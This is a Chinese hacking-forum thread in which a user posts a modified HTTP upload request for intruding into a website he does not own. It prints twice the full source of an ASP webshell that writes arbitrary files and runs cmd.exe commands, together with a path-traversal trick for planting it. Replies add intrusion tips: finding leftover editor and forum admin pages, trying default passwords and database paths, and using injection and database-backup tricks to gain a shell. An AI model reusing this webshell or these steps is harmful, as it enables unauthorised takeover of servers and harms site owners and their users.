议题提交：壹朗
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

下面是我利用WSockExpert抓包信息：（以修改封包）
POST /manage/supfile.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xxxx.com/manage/upfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d6242301106d2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.xxxx.com
Content-Length: 1992
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Cwj=username=asd123; ASPSESSIONIDQARSDSRB=FHOEGEKBDCDAJNAKJEBAPHNP

-----------------------------7d6242301106d2
Content-Disposition: form-data; name="act"

upload
-----------------------------7d6242301106d2
Content-Disposition: form-data; name="filepath"

../bookimages/20064/123.asp
-----------------------------7d6242301106d2
Content-Disposition: form-data; name="file1"; filename="H:\工具\tools\Web木马\webshell\shell.jpg"
Content-Type: text/html

<html><body>
<STYLE TYPE="text/css">textarea,input,body,select,pre,td,th{font-family: "宋体";font-size: 9pt}.button {border-width: 1px}
.text {border:solid 1px}</STYLE>
<Title>壹朗上传</Title>
<%Dim objFSO%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<form action=&#39;&#39; method=post>
<font color=red>请输入文件保存路径:</font><br>
<input type=text name=syfdpath width=32 value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>"
style="border:solid 1px" size=80><br>
输入马的内容:<br>
<textarea name=cyfddata cols=80 rows=10 width=32 style="border:solid 1px"></textarea>
<br><input type=submit value=保存 style="border:solid 1px">
</form><form action="" method="post">
CMD命令:<input type=text name=c style="border:solid 1px" size=73><br>
<textarea cols=80 rows=20 style="border:solid 1px">
<%=server.createobject("wscript.shell").exec("cmd.exe /c" &request("c")).stdout.readall%>
</textarea></form></body></html>
-----------------------------7d6242301106d2
Content-Disposition: form-data; name="Submit"

提交
-----------------------------7d6242301106d2--


注：
修改处（1.）../bookimages/20064/123.asp  原文件../bookimages/
      （2.）Content-Length: 1992   原文件 Content-Length: 1978
疑问处：Content-Type: multipart/form-data; boundary=---------------------------7d6242301106d2

虽然有疑问，但我还是试着用NC提交，返回错误信息“800a0bbc"
写入文件失败``
NC提交错误信息图片

001.jpg (54 KB)
NC提交错误信息图片

2006-4-18 20:35

网站页面是可以正常提交图片文件成功的；

请高手指点其中原由？谢谢！！

你这个网站根本就没有上传的漏洞
哎，你在这问根本也一样解决不了办法的~~~

<br>
输入马的内容:<br>

这好像是个错误。

同意二楼的观点
<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>
看这里  保存成功是你那小马的图片上传上去了  你可以访问一下看看,应该能看到一个图片格式的小马
但是<font color=red>保存失败.可能服务器不支持FSO</font> 这个意思就是 你小马并没有完全上传
这个问题在我的很多只能到后台的 站里碰到过  建议不要死顶在这个上面了
不知道他的后台拿没拿下  还是直接找到的上传路径
如果你到后台了那么还是看一下他后台的功能吧  看是不是有添加上传文件格式的地方或者是否有数据库操作的功能, 还有一点  如果你入侵的网站的整套系统中用了Ewebeditor的话  建议你可以尝试一下那个站长在用Ewebeditor的时候是否保留了程序  你可以看下他的网站 /edit/admin_login.asp 连接  如果有 那确定是有Ewebeditor了  尝试社会工程 看Ewebeditor的数据库路径是否默认 再用默认密码登陆一下  如果可以到Ewebeditor的后台那么就简单了
在Ewebeditor的后台有添加上传文件类型的地方,之后怎么做你应该明白了吧~~? [s:66]

谢谢楼上的分析，
你说的完全正确，我所碰到的情况就是能看到一个图片格式的小马，是一个无法提交的图片马；
这个站后台我已经拿下，在这之前尝试过寻找Ewebeditor，但是因为站点没有集成Ewebeditor，所以此路不通，只好选择抓包了~~
因为曾经有N人拿下此站跟我炫耀，所以自己也想尝试一下，结果受到阻碍了~

这个服务器根本就不存在上传的漏洞
我已经看了，一直围绕在这个上面来，根本没意思

引用:

这里是引用第[3 楼]的donker于2006-04-19 20:06发表的：
同意二楼的观点
<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>
.......

楼主的文章你看懂没有？

<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>

这句根本就是他上传的后门的信息~！
你还分析得到结论，可能是他的小马没有上传，你看得懂上传的表单吗？

引用:

这里是引用第[3 楼]的donker于2006-04-19 20:06发表的：
看这里  保存成功是你那小马的图片上传上去了 你可以访问一下看看,应该能看到一个图片格式的小马
但是<font color=red>保存失败.可能服务器不支持FSO</font> 这个意思就是 你小马并没有完全上传
.......

这段是你的分析，你这段分析得更是……，任何抓过包的人，都不会分析得出你这种结论~
本来看你另外的帖子，还以为你懂ASP，结果看来是我估计错了。

楼主不懂，你们就这么乱说？我如果不说的话，别人搞不好还会把这个帖子引为笑谈。
在邪恶八进制里面出现这种搞笑的分析。

最后，根据这位仁兄的分析，我也可以提醒楼主一下

如果你入侵的网站的整套系统中用了dvbbs的话 建议你可以尝试一下那个站长在用dvbbs的时候是否保留了程序  你可以看下他的网站 /bbs/admin_login.asp 连接 如果有 那确定是有dvbbs了  尝试社会工程 看dvbbs的数据库路径是否默认 再用默认密码登陆一下 如果可以到dvbbs的后台那么就简单了
在dvbbs的后台有备份数据库的地方,之后怎么做你应该明白了吧~~


壹朗：你娃不要不懂装懂，还跟一句什么“楼上分析的完全正确”他真的正确吗？
站出来说句话！

谢谢楼上sobiny兄弟，走了很多弯路，终于在你提示下得到了，哈哈~~心情好可以；网站是动易SQL+动网SQL的，改天有空做个动画上来，这次终于体会到了“通往电脑的路不只一条”

sobiny请看：

Content-Type: multipart/form-data; boundary=---------------------------7d6242301106d2

为什么抓包的时候这个地方与别的站点抓包数据不一样，这个应该是我这边的相关信息呀？？
这个地方还是不明白；

引用:

这里是引用第[3 楼]的donker于2006-04-19 20:06发表的：
同意二楼的观点
<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>
.......

兄弟你利害呀,,又跟你学到一招,以后搞站就照你说的先去找找白痴管理员留下的Ewebeditor来弄弄,,看是不是真有那么多跟你说的一样的管理员..

引用:

这里是引用第[3 楼]的donker于2006-04-19 20:06发表的：“但是<font color=red>保存失败.可能服务器不支持FSO</font> 这个意思就是 你小马并没有完全上传”.......

这个只是一个马里面的内容，跟他上传没有什么干系。。难道你没上传过图片格式的ASP马？？要是没传过那也就不能怪你了，，呵呵。

引用:

这里是引用第[3 楼]的donker于2006-04-19 20:06发表的：如果你到后台了那么还是看一下他后台的功能吧 看是不是有添加上传文件格式的地方或者是否有数据库操作的功能

请问下兄台我弄了个洞网的后台，有可以改上传文件格式的。。怎么还是怎么不了ASP啊，难道是偶长像问题……

还有，楼猪你确定该upfile文件存在上传漏洞？？如果没存在漏洞的话你修改封名这样传得上去吗？就像邪八一样，你去抓包修改看能不能弄嘛，你说后台你拿下了。那你先看下有没有导出邮件或模板、备份恢复数据库之类的。
[s:83]

谢谢  我并没说我那是在对抓的包进行什么分析  我只是想告诉他错误最基本的那一点`~~~明白~?
根据楼主的提问已经知道楼主可能是刚刚想学习网络安全的  简单明了的说下问题  有错吗~? [s:75]
关于楼上  好象在跟什么附赫  关于Ewebeditor 请楼上注意 如果你自己去写代码写网站的话你就知道在后台的开发的时候自己会多郁闷  至少是对我这种菜鸟来说  所以很多人比较喜欢用一些插件,而我认识的一些小站站长,在他们自己开发后台感觉太累的时候就会用些插件来增加功能 当然很多不怎么懂安全的人有时候会对插件的安全比较疏忽  声名 我只 是给楼主个建议  入侵不就是多尝试嘛~~~反正我这样的菜鸟是不能拿个站就能看出那里有漏洞

关于sobiny  ,我再次无语~~~好象你应该比我还小  象个孩子  
ASP~~~呵呵  虽然我可能不是象你那种黑客  但是一些脚本还是明白的  只是不懂怎么利用到攻击上 更多的我学的是怎么防范  
如果你入侵的网站的整套系统中用了dvbbs的话 建议你可以尝试一下那个站长在用dvbbs的时候是否保留了程序  你可以看下他的网站 /bbs/admin_login.asp 连接 如果有 那确定是有dvbbs了  尝试社会工程 看dvbbs的数据库路径是否默认 再用默认密码登陆一下 如果可以到dvbbs的后台那么就简单了
在dvbbs的后台有备份数据库的地方,之后怎么做你应该明白了吧~~
这个好象跟没说一样  别生气  不是针对你  这个好象一般很菜的站长都会怎么摆平了  沙滩小子已经把动网弄的不错了  只所以之前出了很多漏洞 是因为他的开源作风  我是很佩服这种人的  所以我一直用的动网
如果有时间大家都可以到动网或动易或风讯的论坛找我交流  当然我也是菜鸟 所以才选了那几个管理系统
扯远了~~~ 回来说下动网  /bbs/admin_login.asp  还在用默认后台的站长现在已经很少了~~~7.1已经有了再后台直接改后台地址和上传目录的功能  
dvbbs的数据库路径是否默认  这个就更......  现在谁还不会把数据库文件夹搞个@##啊  文件谁还不会加个#改改扩展名啊  谁还不会加条<%nodownload%> 啊  也许有一些很长时间没去动网论坛的站长或没被人害过的人才不会去改  至于admin888估计随便一个站长都不会把这种东西上传到空间的 本机调试的时候也许就改了
  楼主说那站系统是动易SQL加动网的组合  很巧  我的站也是这个组合  (很容易整和嘛,呵呵)
动易2005之前的漏洞不提  上传漏洞不说他了, 2005和2005SP2的注入漏洞我还是了解的(webboy封装也没挡住某个牛人哦) 2005的工人用户短消息发送功能处有注入漏洞 利用很简单 直接update 管理员密码就好了  SP2个人文集操作处的注入漏洞不容易利用Admin_ChkCode.asp文件中将EnableSiteManageCode即使是免费版也能直接添加管理验证码,所以 即使你拿了密码 也无能为力(当然指的是到后台拿webshell)  
而动易2006的注入漏洞  不财  小弟正在挖掘 如果有可能 请关注黑X或黑防  希望菜弟我发表后能有朋友买帐 因为webboy在2006版里又从新封装,对我这种菜鸟来说实在是不容易哦  不过好象听说有些高手对他的DLL组件有办法 (很悬,听了很怕)
动网7.1SP1的漏洞现在很多人写的文章也只是一些到后台拿webshell的方法  
sobiny 所说直接用备份数据库的方法不行哦  沙滩很毒哦  直接在代码中封杀了 数据库操作时的asp解析问题
所以7.1SP1 AC目前我所知的也不过是 新建空数据库绑小马改扩展名上传或插入一句话木马再改扩展名上传再备份或恢复(当然比较懂的站长都会最限制的,  规定数据库备份目录 给此目录一个单独权限,所以我感觉7.1很安全了)

[s:75]

既然sobiny 前辈都提出来了 我就稍微说下那破包的问题吧  咳~~还真累(谁让我比较和蔼可亲呢)
不过我也不是很懂  错了不要再来骂我啊  菜鸟怎么这么难呢 想跟你们学点网络安全都这么难[s:75]
POST /manage/supfile.asp HTTP/1.1
表单提交  提交目标supfile.asp
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
这个不是很懂  也没研究过   跟系统有关  如果是动易的话就应该是动易那个默认的图片文件夹有关了
(其实这个没什么用  我感觉是这样 呵呵)
Referer: http://www.xxxx.com/manage/upfile.asp
提交地址
Accept-Language: zh-cn
语言 这个我多嘴了 都知道
Content-Type: multipart/form-data; boundary=---------------------------7d6242301106d2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
这是楼主的PC IE 信息  他就用这个判断用户的IE版本 系统等 (我好象都再废话,高手别看,我只是在这瞎白虎一下而已  呵呵)
Host: www.xxxx.com
主机地址
Content-Length: 1992
楼主上传提交的字节数  好大啊  建议楼主换个小点的马  呵呵
Connection: Keep-Alive
Cache-Control: no-cache
连接说明而已  没毛用  设定最大缓存那些东西  也许有些站长会自己去设置一些东西改最大缓存
Cookie: Cwj=username=asd123; ASPSESSIONIDQARSDSRB=FHOEGEKBDCDAJNAKJEBAPHNP
这个应该玩网络安全的都比我明白
username=asd123  楼主的名字
ASPSESSIONIDQARSDSRB=FHOEGEKBDCDAJNAKJEBAPHNP
根据这个如果有经验的应该能判断出一些有用的数据库信息  我不怎么懂  用的太少了哦  菜鸟嘛
都说可以判断版本 我怎么就总搞乱了呢  总错  呵呵

Content-Disposition: form-data; name="act"

upload
之后这些不用说了吧  上传操作对象
../bookimages/20064/123.asp  上传路径(但可不一定准儿哦)
以后就楼主的信息  不用啥分析啦吧
Content-Disposition: form-data; name="file1"; filename="H:\工具\tools\Web木马\webshell\shell.jpg"
Content-Type: text/html
这些谁都明白  楼主最清楚  呵呵
<html><body>
<STYLE TYPE="text/css">textarea,input,body,select,pre,td,th{font-family: "宋体";font-size: 9pt}.button {border-width: 1px}
.text {border:solid 1px}</STYLE>
<Title>壹朗上传</Title>
<%Dim objFSO%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<form action=&#39;&#39; method=post>
<font color=red>请输入文件保存路径:</font><br>
<input type=text name=syfdpath width=32 value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>"
style="border:solid 1px" size=80><br>
输入马的内容:<br>
<textarea name=cyfddata cols=80 rows=10 width=32 style="border:solid 1px"></textarea>
<br><input type=submit value=保存 style="border:solid 1px">
</form><form action="" method="post">
CMD命令:<input type=text name=c style="border:solid 1px" size=73><br>
<textarea cols=80 rows=20 style="border:solid 1px">
<%=server.createobject("wscript.shell").exec("cmd.exe /c" &request("c")).stdout.readall%>
</textarea></form></body></html>
-----------------------------7d6242301106d2
Content-Disposition: form-data; name="Submit"

提交

小马上传回显   没成功 我也替楼主惋惜  菜鸟学习是很不容易  什么时候高手都能同情一些我们这些菜鸟哦
好象学点网络安全  保护自己的服务器  

  [s:35]  [s:35]

希望要说什么话的朋友以你的技术和你的研究来说服我
不要以你朋友的朋友是什么职业来说
这个对我来说没任何意义，我也不想了解。
在自己测试不能成功的时候
也不要用“我不想入侵”来敷衍…………
讨论技术性的东西，就不要说太多装B的话

这个兄弟有点没必要吧 也过了哦`~? 都成年人了还搞那些 呵呵  不做评论了
[s:59]

最后对楼主和sobiny说声歉意~~~两个不同方面  也许我在网络安全方面该继续我的潜水生涯  哈哈

-----------------------------7d6242301106d2
Content-Disposition: form-data; name="filepath"

../bookimages/20064/123.asp

问一下,要是抓包过程中抓不到这样的路径的话,那我应该怎么利用呢?是不是放弃? [s:34]
大多数情况下我们都点子不是很好,抓不到服务器保存的路径,这样我们应该怎么样去修改包呀?
请各位老大们指点指点 [s:57]

引用:

这里是引用第[3 楼]的donker于2006-04-19 20:06发表的：
同意二楼的观点
<%if err =0 then%>
<font color=red>保存成功.请返回刷新页面!</font>
<%else%>
<font color=red>保存失败.可能服务器不支持FSO</font>
看这里  保存成功是你那小马的图片上传上去了 你可以访问一下看看,应该能看到一个图片格式的小马
但是<font color=red>保存失败.可能服务器不支持FSO</font> 这个意思就是 你小马并没有完全上传
这个问题在我的很多只能到后台的 站里碰到过  建议不要死顶在这个上面了
..

兄弟我看你写了很多,确实不容易,但是这个错误确实是太大了,可能会成为别人对邪八的笑谈,看了你下面的帖子,确实也不容易的,反正网络安全比我好得多.不过在这里混久了总觉得骂人或生气的话会让SOMEONE给你加分.............这里纯属本人自己的观点(持保留意见)..为什么都静不下心来...
多嘴了...

看了半天也没看到楼主是怎么拿下这个站的

说了.这么多.也只不过想以别人对你的侮辱做一个反驳.但是我觉得..您的确错了...

没事的时候自己抓几个包好好看看..

那两句话是楼主ASP里面的内容

继续潜水..

分析的太多了。眼睛都看花了。
动画放出来吧。。

不好意思 我这这里用一下。
也是winsock 的抓包问题
我再用winsock抓包 试图获取我的文件上传地址，可是当打开那个网页时 winsock就卡死了，然后我又测试其他网页发现正常 ，是不是远程服务器限制 还是网页属性问题，郁闷啊 请高手指教，谢谢

引用:

引用第20楼lafkkk于2007-10-07 14:14发表的 :
不好意思 我这这里用一下。
也是winsock 的抓包问题
我再用winsock抓包 试图获取我的文件上传地址，可是当打开那个网页时 winsock就卡死了，然后我又测试其他网页发现正常 ，是不是远程服务器限制 还是网页属性问题，郁闷啊 请高手指教，谢谢

我也碰到过类似的,不只是抓IE.有时候需要把进程关闭 然后把抓包工具也关闭 然后重新访问网站在抓.
好象每次我出现这种问题都是因为之前抓过一次然后直接关闭的抓包工具的任务,然后在抓.
有可能是句柄等问题导致的吧.

我以前也经常遇到楼上两位说的那些情况，有时候需要关闭winsock数次，直到出现||符号为止（不正常的时候好像都是三角符号）。
我猜也许是跟系统内存有点关系（乱猜的）。因为有时候我在抓包的时候，发现某些输入法就不能正常使用了。关掉winsock就一切正常。
还有，楼主写入失败也许跟目录权限有关，也就是说当前目录没有写入权限，或者当前目录不存在。也有这种情况。可以试试跳转到其它目录。，反正filepath可以乱改的嘛，跳转上去就好了。

有上传漏洞 写不进去可能是权限问题

问一个，抓包 ，没抓到../bookimages/20064/123.asp 这们抓到上传路径，怎么办？